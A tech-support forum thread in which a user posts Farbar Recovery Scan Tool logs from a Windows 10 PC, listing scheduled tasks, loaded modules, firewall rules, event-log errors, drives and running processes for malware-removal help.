Task: {D79D3569-3255-4B3C-BFBE-3FF4BAAE1A39} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2015-08-11] (Adobe Systems Incorporated)
Task: {DC2DEA8F-59C9-40A7-92A2-FDE0CB8A3A21} - System32\Tasks\ParetoLogic Registration3 => Rundll32.exe "C:\Program Files (x86)\Common Files\ParetoLogic\UUS3\UUS3.dll" RunUns
Task: {E56BA0AB-FE56-4C67-9AB5-01B1F903A2BE} - System32\Tasks\Norton Internet Security\Norton Error Analyzer => C:\Program Files (x86)\Norton Internet Security\Engine\22.5.2.15\SymErr.exe [2015-05-19] (Symantec Corporation)
Task: {E5B6457C-F5F9-4E3A-98D5-71C44AA0148E} - System32\Tasks\{00545BF5-217A-4D18-9F0F-36D7DE53FCFD} => C:\Program Files\Microprose\Test of Time\civ2.exe
Task: {E8FA7856-F1C0-48C9-88EE-4613503C97E8} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {EC1C883A-07E5-4FAC-AA5E-84DE307C080F} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.)
Task: {F16B6BC2-9F7B-441F-BBB2-7680B691E92E} - System32\Tasks\AdobeAAMUpdater-1.0-KenTerry-HP-Ken Terry => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2015-02-03] (Adobe Systems Incorporated)
Task: {F4306827-C9D2-4342-B58D-C16423612C57} - System32\Tasks\Norton Internet Security\Norton Autofix => C:\Program Files (x86)\Norton Internet Security\Engine\22.5.2.15\SymErr.exe [2015-05-19] (Symantec Corporation)
Task: {F51BD286-3A30-4E1B-B378-563861E37E9E} - System32\Tasks\DropboxUpdateTaskUserS-1-5-21-2815594105-2774959023-4293743994-1001UA => C:\Users\Ken Terry\AppData\Local\Dropbox\Update\DropboxUpdate.exe [2015-06-21] (Dropbox, Inc.)
Task: {F5B37634-028A-4669-9DA2-63DECF76903C} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {F7F9BDB0-A368-4E09-9ED0-7931DF6EBE1A} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2015-07-07] (Adobe Systems Incorporated)
Task: {F809B3DB-23B7-4759-B88C-17638039582F} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => C:\Windows\ehome\mcupdate.exe
Task: {F8B77A2C-235E-49CC-A4C5-73D32C5469B1} - System32\Tasks\HP Photo Creations Communicator => C:\ProgramData\HP Photo Creations\Communicator.exe [2013-03-16] ()
Task: {FC168DBD-8327-4CC8-BEBE-28B294DC8806} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => C:\Windows\ehome\mcupdate.exe

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\WINDOWS\Tasks\DropboxUpdateTaskUserS-1-5-21-2815594105-2774959023-4293743994-1001Core.job => C:\Users\Ken Terry\AppData\Local\Dropbox\Update\DropboxUpdate.exe
Task: C:\WINDOWS\Tasks\DropboxUpdateTaskUserS-1-5-21-2815594105-2774959023-4293743994-1001UA.job => C:\Users\Ken Terry\AppData\Local\Dropbox\Update\DropboxUpdate.exe
Task: C:\WINDOWS\Tasks\FacebookUpdateTaskUserS-1-5-21-2815594105-2774959023-4293743994-1001Core.job => C:\Users\Ken Terry\AppData\Local\Facebook\Update\FacebookUpdate.exe
Task: C:\WINDOWS\Tasks\FacebookUpdateTaskUserS-1-5-21-2815594105-2774959023-4293743994-1001UA.job => C:\Users\Ken Terry\AppData\Local\Facebook\Update\FacebookUpdate.exe
Task: C:\WINDOWS\Tasks\G2MUpdateTask-S-1-5-21-2815594105-2774959023-4293743994-1001.job => C:\Users\Ken Terry\AppData\Local\Citrix\GoToMeeting\2553\g2mupdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\HP Photo Creations Communicator.job => C:\ProgramData\HP Photo Creations\Communicator.exe
Task: C:\WINDOWS\Tasks\HPCeeScheduleForKen Terry.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe
Task: C:\WINDOWS\Tasks\ParetoLogic Registration3.job => C:\Windows\system32\rundll32.exeGC:\Program Files (x86)\Common Files\ParetoLogic\UUS3\UUS3.dll

==================== Loaded Modules (Whitelisted) ==============

2015-08-11 21:52 - 2015-08-11 21:52 - 00032768 _____ () C:\WINDOWS\SYSTEM32\licensemanagerapi.dll
2015-01-20 23:35 - 2015-01-20 23:35 - 00085832 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2015-05-15 16:26 - 2015-05-15 16:26 - 01346344 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2015-08-19 00:05 - 2015-08-11 04:14 - 00404480 _____ () C:\WINDOWS\System32\diagtrack_wininternal.dll
2015-09-12 12:50 - 2015-09-12 12:50 - 00163576 _____ () C:\Program Files\Reason\Security\Protection\rscp\bin\rscp_svc.exe
2015-07-16 05:45 - 2015-07-16 05:45 - 00105112 _____ () C:\Program Files (x86)\Intel Driver Update Utility\SUR\SurSvc.exe
2015-08-19 00:05 - 2015-07-30 01:05 - 02498808 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2015-09-12 12:50 - 2015-09-12 12:50 - 00401144 _____ () C:\Program Files\Reason\Security\Protection\rscp\bin\rscp_bg.exe
2010-08-18 02:55 - 2009-02-27 21:13 - 00053248 _____ () C:\Program Files (x86)\Hewlett-Packard\HP MAINSTREAM KEYBOARD\ModLEDKey.exe
2015-08-19 00:05 - 2015-07-30 01:05 - 02498808 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2015-07-10 05:59 - 2015-07-10 05:59 - 00429056 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2015-07-10 05:59 - 2015-07-10 05:59 - 00143360 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\XamlTileRendering.dll
2010-01-18 12:21 - 2010-01-18 12:21 - 00568888 _____ () C:\Program Files\Hewlett-Packard\HP MediaSmart\SmartMenu.exe
2014-09-11 10:39 - 2015-07-21 00:02 - 05887808 _____ () C:\Users\Ken Terry\AppData\Local\Amazon Music\Amazon Music Helper.exe
2015-09-14 12:05 - 2014-09-23 17:19 - 00146736 ____N () C:\Program Files\Earth Networks\WeatherBug\WeatherBug.exe
2011-02-03 18:39 - 2007-12-14 17:58 - 00241664 _____ () C:\Program Files (x86)\Philips\Philips SPC230NC Webcam\TrayMin230.exe
2015-08-20 12:37 - 2015-07-16 05:52 - 00413848 _____ () C:\Program Files\Intel\SUR\WILLAMETTE\ESRV\esrv_svc.exe
2015-08-20 12:37 - 2015-07-16 05:59 - 00709272 _____ () C:\Program Files\Intel\SUR\WILLAMETTE\ESRV\intel_modeler.dll
2015-08-20 12:37 - 2015-07-16 05:56 - 00130712 _____ () C:\Program Files\Intel\SUR\WILLAMETTE\ESRV\intel_process_input.dll
2015-08-20 12:37 - 2015-07-16 05:56 - 00025752 _____ () C:\Program Files\Intel\SUR\WILLAMETTE\ESRV\intel_system_power_state_input.dll
2015-08-20 12:37 - 2015-07-16 05:56 - 00059544 _____ () C:\Program Files\Intel\SUR\WILLAMETTE\ESRV\intel_quality_and_reliability_input.dll
2015-08-20 12:37 - 2015-07-16 05:57 - 00194712 _____ () C:\Program Files\Intel\SUR\WILLAMETTE\ESRV\acpi_battery_input.dll
2015-08-20 12:37 - 2015-07-16 05:58 - 00159896 _____ () C:\Program Files\Intel\SUR\WILLAMETTE\ESRV\sema_thermal_input.dll
2015-08-20 12:37 - 2015-07-16 05:58 - 00158360 _____ () C:\Program Files\Intel\SUR\WILLAMETTE\ESRV\wifi_input.dll
2015-08-20 12:37 - 2015-07-16 05:57 - 00050840 _____ () C:\Program Files\Intel\SUR\WILLAMETTE\ESRV\devices_use_input.dll
2015-08-20 12:37 - 2015-07-16 05:55 - 00032920 _____ () C:\Program Files\Intel\SUR\WILLAMETTE\ESRV\intel_disktrace_input.dll
2015-07-10 08:17 - 2015-07-10 08:17 - 00007168 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_15.618.18170.0_x64__8wekyb3d8bbwe\Microsoft.Photos.exe
2015-07-10 08:17 - 2015-07-10 08:17 - 13490688 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_15.618.18170.0_x64__8wekyb3d8bbwe\Microsoft.Photos.dll
2015-08-19 00:05 - 2015-08-02 20:11 - 06569472 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2015-07-10 06:00 - 2015-07-10 08:14 - 00471040 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2015-08-19 00:05 - 2015-08-11 03:58 - 01808384 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2015-08-19 00:05 - 2015-08-02 20:09 - 02274816 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

AlternateDataStreams: C:\ProgramData\Reprise:wupeogjxldtlfudivq`qsp`26hfm
AlternateDataStreams: C:\ProgramData\Temp:0B4227B4
AlternateDataStreams: C:\ProgramData\Temp:7C3E753C
AlternateDataStreams: C:\ProgramData\Temp:AA6C7C38
AlternateDataStreams: C:\ProgramData\Temp:ABCD2B94
AlternateDataStreams: C:\ProgramData\Temp:ADE71A34
AlternateDataStreams: C:\ProgramData\Temp:F3AB0B43

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)


==================== EXE Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Ken Terry\Pictures\Ken's retirement pictures\couple 8x10.jpg
DNS Servers: 192.168.0.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(Currently there is no automatic fix for this section.)

MSCONFIG\startupreg: ApnUpdater => "C:\Program Files (x86)\Ask.com\Updater\Updater.exe"
MSCONFIG\startupreg: APSDaemon => "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
MSCONFIG\startupreg: NCNETWORKSDM => "C:\Program Files (x86)\NCNETWORKSDM\bin\sprtcmd.exe" /P NCNETWORKSDM

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [MSMQ-In-TCP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-Out-TCP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-In-UDP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-Out-UDP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [WCF-NetTcpActivator-In-TCP-64bit] => (Allow) LPort=808
FirewallRules: [{AFE9F478-5704-41DC-94FA-7B0026BD74BF}] => (Allow) C:\Program Files (x86)\Raptr\raptr_im.exe
FirewallRules: [{86DEC5CE-656D-4E58-B812-98088CD55E6A}] => (Allow) C:\Program Files (x86)\Raptr\raptr_im.exe
FirewallRules: [{6EFE4168-CE0D-4823-97F8-5550D33CE9B3}] => (Allow) C:\Program Files (x86)\Raptr\raptr.exe
FirewallRules: [{293B0B75-5656-46CF-870D-A3F34818563E}] => (Allow) C:\Program Files (x86)\Raptr\raptr.exe
FirewallRules: [{FFD77524-F52F-4631-9EC3-AA846CBFA6CE}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{0D626D4E-4F3D-45E1-89D4-51E8E27584E0}] => (Allow) C:\Program Files (x86)\2K Games\Firaxis Games\Sid Meier's Civilization IV Colonization\Colonization.exe
FirewallRules: [{CA9F8700-15C3-4E64-884E-88B9DA3A0579}] => (Allow) C:\Program Files (x86)\2K Games\Firaxis Games\Sid Meier's Civilization IV Colonization\Colonization.exe
FirewallRules: [{F5A6F06F-F11F-44D8-B648-49949E591607}] => (Allow) C:\Program Files (x86)\2K Games\Firaxis Games\Sid Meier's Civilization 4 Complete\Beyond the Sword\Civ4BeyondSword.exe
FirewallRules: [{0F3FB7A0-10F2-4B13-825F-826490913B6A}] => (Allow) C:\Program Files (x86)\2K Games\Firaxis Games\Sid Meier's Civilization 4 Complete\Beyond the Sword\Civ4BeyondSword.exe
FirewallRules: [{CB9B2D0A-DD48-4055-B2F5-5CEEF5CDB01B}] => (Allow) C:\Program Files (x86)\2K Games\Firaxis Games\Sid Meier's Civilization 4 Complete\Warlords\Civ4Warlords.exe
FirewallRules: [{61ED1EA4-90C3-4B99-8E52-DDF64D007A1F}] => (Allow) C:\Program Files (x86)\2K Games\Firaxis Games\Sid Meier's Civilization 4 Complete\Warlords\Civ4Warlords.exe
FirewallRules: [{42CD1370-E7B9-4FD4-A3A7-8DD2784959F7}] => (Allow) C:\Program Files (x86)\2K Games\Firaxis Games\Sid Meier's Civilization 4 Complete\Civilization4.exe
FirewallRules: [{477A4319-A9D4-4229-8B90-1808813DEBBE}] => (Allow) C:\Program Files (x86)\2K Games\Firaxis Games\Sid Meier's Civilization 4 Complete\Civilization4.exe
FirewallRules: [{90D71A8D-B1C5-474A-9EF9-9F5229DD86E2}] => (Allow) C:\Program Files (x86)\Electronic Arts\Command and Conquer Red Alert II\RA2Launcher.exe
FirewallRules: [{BFE8BDF1-F929-4998-92F7-E6EB3DE1B73C}] => (Allow) C:\Program Files (x86)\Electronic Arts\Command and Conquer Red Alert II\RA2Launcher.exe
FirewallRules: [{0AA40B32-55AA-47A1-B68A-7CA1187C7830}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{432DF22E-27C8-4E15-80B4-482CE69603D8}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{AFC6E203-E2A9-40B3-9D4C-E39BAC572185}] => (Allow) C:\Program Files (x86)\Electronic Arts\CNC and The Covert Operations\CNC95Launcher.exe
FirewallRules: [{79122C12-84E5-4F8E-8591-882F386D213D}] => (Allow) C:\Program Files (x86)\Electronic Arts\CNC and The Covert Operations\CNC95Launcher.exe
FirewallRules: [{F044B55D-1BD5-43B7-889B-757298E8D7A0}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{63BF363C-A2F3-4898-8124-8E392B149665}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{F23517C1-B543-42D2-91BD-C364E0EDB8B8}] => (Allow) C:\Users\Ken Terry\AppData\Local\Temp\7zS0441\hppiw.exe
FirewallRules: [{8502641D-0F94-4583-9068-6839DC6ABC76}] => (Allow) C:\Users\Ken Terry\AppData\Local\Temp\7zS0441\hppiw.exe
FirewallRules: [{2218CF0B-530B-4EF3-BA71-96D65C657BE6}] => (Allow) C:\Users\Ken Terry\AppData\Local\Temp\7zS00D9\hppiw.exe
FirewallRules: [{F520E2C6-A65F-4BEE-85EC-851903BCB255}] => (Allow) C:\Users\Ken Terry\AppData\Local\Temp\7zS00D9\hppiw.exe
FirewallRules: [{EE642384-D63C-4687-B903-F5B937A79A76}] => (Allow) C:\Users\Ken Terry\AppData\Local\Temp\7zS005D\hppiw.exe
FirewallRules: [{844908F8-D0CA-450F-821F-BFB1B70E9EFA}] => (Allow) C:\Users\Ken Terry\AppData\Local\Temp\7zS005D\hppiw.exe
FirewallRules: [{C20E561D-AC3F-468E-A224-23B57E9A807A}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\sid meier's civilization v\Launcher.exe
FirewallRules: [{666E9004-D475-4239-8511-37BC23FDC5F5}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\sid meier's civilization v\Launcher.exe
FirewallRules: [{EE381D13-6C4E-49D5-9FD9-823A808501BC}] => (Allow) C:\Windows\SysWOW64\ARFC\wrtc.exe
FirewallRules: [{0B8B5A13-4E93-4F77-BC87-06D9319DF543}] => (Allow) C:\Windows\SysWOW64\ARFC\wrtc.exe
FirewallRules: [{38C5704D-6F6E-4E27-9475-FFFF85D8A68A}] => (Allow) C:\Windows\System32\dmwu.exe
FirewallRules: [{AFB61E77-153E-4E37-A936-A31ADE3CF92F}] => (Allow) C:\Windows\System32\dmwu.exe
FirewallRules: [UDP Query User{7CC9ABFF-AD51-4CF6-90BA-21425D98B163}C:\program files\hp\hp officejet 6700\bin\hpnetworkcommunicator.exe] => (Allow) C:\program files\hp\hp officejet 6700\bin\hpnetworkcommunicator.exe
FirewallRules: [TCP Query User{091A8FCB-ACC8-48F5-8649-31EAC56D1873}C:\program files\hp\hp officejet 6700\bin\hpnetworkcommunicator.exe] => (Allow) C:\program files\hp\hp officejet 6700\bin\hpnetworkcommunicator.exe
FirewallRules: [{74B85282-D49D-4A6E-A474-93692BC210CF}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{AB6A4C6C-8DF4-4542-B631-EE56835C4409}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{0796DCBF-D5BC-4477-B90F-81D5A5EFAA62}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{73EEE2BE-EB2F-4B42-BB41-E8D42AB0B3D8}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{971D3A3B-1A09-48D3-89BF-D5214FE440DF}] => (Allow) C:\Windows\SysWOW64\ARFC\wrtc.exe
FirewallRules: [{0D968DC5-19C6-4A36-A40B-95B46F00EA6D}] => (Allow) C:\Windows\SysWOW64\ARFC\wrtc.exe
FirewallRules: [{D5DF5EB0-0259-44C1-99A1-6F1E8B9BF721}] => (Allow) C:\Windows\System32\dmwu.exe
FirewallRules: [{98997453-AA80-46EE-A9CD-49397716BE70}] => (Allow) C:\Windows\System32\dmwu.exe
FirewallRules: [UDP Query User{88FFA17E-362A-4EAF-8317-299AB3674EE7}C:\program files\hp\hp officejet 6700\bin\hpnetworkcommunicator.exe] => (Block) C:\program files\hp\hp officejet 6700\bin\hpnetworkcommunicator.exe
FirewallRules: [TCP Query User{32E2F11D-F55E-4FF5-B1E6-A73462A2D09F}C:\program files\hp\hp officejet 6700\bin\hpnetworkcommunicator.exe] => (Block) C:\program files\hp\hp officejet 6700\bin\hpnetworkcommunicator.exe
FirewallRules: [{7154E597-3D17-4541-B0C6-D618A4527188}] => (Allow) C:\Program Files\iTunes\iTunes.exe
FirewallRules: [{C8BC4B7E-CDFE-4127-B934-A30E217E4F0B}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPDeviceDetection3.exe
FirewallRules: [{443544C9-F0F8-45FF-B5ED-B42FE3C912F8}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{A3E863D9-3181-48BB-909D-CDCADC987046}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

==================== Faulty Device Manager Devices =============

Name:
Description:
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer:
Service:
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: 260ci WIA Driver (USB)
Description: 260ci WIA Driver (USB)
Class Guid: {6bdd1fc6-810f-11d0-bec7-08002be2092f}
Manufacturer: Kyocera
Service: usbscan
Problem: : This device cannot start. (Code10)
Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device.
On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.


==================== Event log errors: =========================

Application errors:
==================
Error: (09/17/2015 02:09:04 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: SearchUI.exe, version: 10.0.10240.16431, time stamp: 0x55c9bba1
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xe0464645
Fault offset: 0x0000000000000000
Faulting process id: 0x194c
Faulting application start time: 0xSearchUI.exe0
Faulting application path: SearchUI.exe1
Faulting module path: SearchUI.exe2
Report Id: SearchUI.exe3
Faulting package full name: SearchUI.exe4
Faulting package-relative application ID: SearchUI.exe5

Error: (09/17/2015 07:47:25 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: KenTerry-HP)
Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (09/17/2015 07:45:30 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: KenTerry-HP)
Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (09/17/2015 02:02:59 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: svchost.exe_MapsBroker, version: 10.0.10240.16384, time stamp: 0x559f38cb
Faulting module name: MosHostCore.dll, version: 10.0.10240.16384, time stamp: 0x559f3908
Exception code: 0xc0000005
Fault offset: 0x00000000000096f2
Faulting process id: 0x6580
Faulting application start time: 0xsvchost.exe_MapsBroker0
Faulting application path: svchost.exe_MapsBroker1
Faulting module path: svchost.exe_MapsBroker2
Report Id: svchost.exe_MapsBroker3
Faulting package full name: svchost.exe_MapsBroker4
Faulting package-relative application ID: svchost.exe_MapsBroker5

Error: (09/16/2015 07:07:11 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 2281

Error: (09/16/2015 07:07:11 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 2281

Error: (09/16/2015 07:07:11 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second

Error: (09/16/2015 07:07:10 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 1094

Error: (09/16/2015 07:07:10 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 1094

Error: (09/16/2015 07:07:10 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second


System errors:
=============
Error: (09/17/2015 1057 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYLOCAL SERVICES-1-5-19LocalHost (Using LRPC)UnavailableUnavailable

Error: (09/17/2015 07:50:08 AM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Ralink UPnP Media Server service to connect.

Error: (09/17/2015 07:50:07 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Reason Core Security Engine Service service failed to start due to the following error:
%%1053

Error: (09/17/2015 07:50:07 AM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Reason Core Security Engine Service service to connect.

Error: (09/17/2015 07:49:39 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The TelevisionFanaticService service failed to start due to the following error:
%%2

Error: (09/17/2015 07:49:32 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Net.Tcp Listener Adapter service depends on the Net.Tcp Port Sharing Service service which failed to start because of the following error:
%%1058

Error: (09/17/2015 07:48:05 AM) (Source: Service Control Manager) (EventID: 7043) (User: )
Description: The Diagnostics Tracking Service service did not shut down properly after receiving a preshutdown control.

Error: (09/17/2015 07:47:43 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Microsoft Account Sign-in Assistant service failed to start due to the following error:
%%1053

Error: (09/17/2015 07:47:32 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Group Policy Client service failed to start due to the following error:
%%1053

Error: (09/17/2015 07:47:32 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Group Policy Client service failed to start due to the following error:
%%1053


CodeIntegrity:
===================================
Date: 2015-08-21 08:59:33.650
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\Windows\assembly\GAC\ADODB\7.0.3300.0__b03f5f7f11d50a3a\ADODB.dll that did not meet the Microsoft signing level requirements.

Date: 2015-08-21 08:59:33.416
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\Windows\assembly\GAC\ADODB\7.0.3300.0__b03f5f7f11d50a3a\ADODB.dll that did not meet the Microsoft signing level requirements.


==================== Memory info ===========================

Processor: Intel(R) Core(TM) i5 CPU 650 @ 3.20GHz
Percentage of memory in use: 49%
Total physical RAM: 8119.07 MB
Available physical RAM: 4138.42 MB
Total Virtual: 8631.07 MB
Available Virtual: 2936.46 MB

==================== Drives ================================

Drive c: (OS) (Fixed) (Total:918.83 GB) (Free:653.43 GB) NTFS
Drive d: (HP_RECOVERY) (Fixed) (Total:12.15 GB) (Free:1.48 GB) NTFS ==>[system with boot components (obtained from reading drive)]

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 931.5 GB) (Disk ID: 41AA0483)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=918.8 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=450 MB) - (Type=27)
Partition 4: (Not Active) - (Size=12.1 GB) - (Type=07 NTFS)

==================== End of Addition.txt ============================
kfoxsr is offline  
Sponsored Links
Advertisement
 
Old 09-18-2015, 04:46 AM   #4
Registered Member
 
Join Date: Sep 2015
Posts: 13
OS: windows 10



Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:15-09-2015
Ran by Ken Terry (administrator) on KENTERRY-HP (17-09-2015 14:13:41)
Running from C:\Users\Ken Terry\Downloads
Loaded Profiles: Ken Terry (Available Profiles: Ken Terry & DefaultAppPool)
Platform: Windows 10 Home (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Edge)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: FRST Tutorial - How to use Farbar Recovery Scan Tool - Geeks to Go Forum

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AMD) C:\Windows\System32\atiesrxx.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(CinemaNow, Inc.) C:\Program Files (x86)\CinemaNow\CinemaNow Media Manager\CinemaNowSvc.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Application Virtualization Client\sftvsa.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Common Files\LightScribe\LSSrvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
(Microsoft Corporation) C:\Windows\System32\mqsvc.exe
(Symantec Corporation) C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Internet Security\Engine\22.5.2.15\nis.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
(PDF Complete Inc) C:\Program Files (x86)\PDF Complete\pdfsvc.exe
(iWin Inc.) C:\Program Files (x86)\Pogo Games\PGMTrusted.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
() C:\Program Files\Reason\Security\Protection\rscp\bin\rscp_svc.exe
(Ralink Technology, Corp.) C:\Program Files (x86)\Ralink\Common\RaRegistry.exe
(Ralink Technology, Corp.) C:\Program Files (x86)\Ralink\Common\RaRegistry64.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
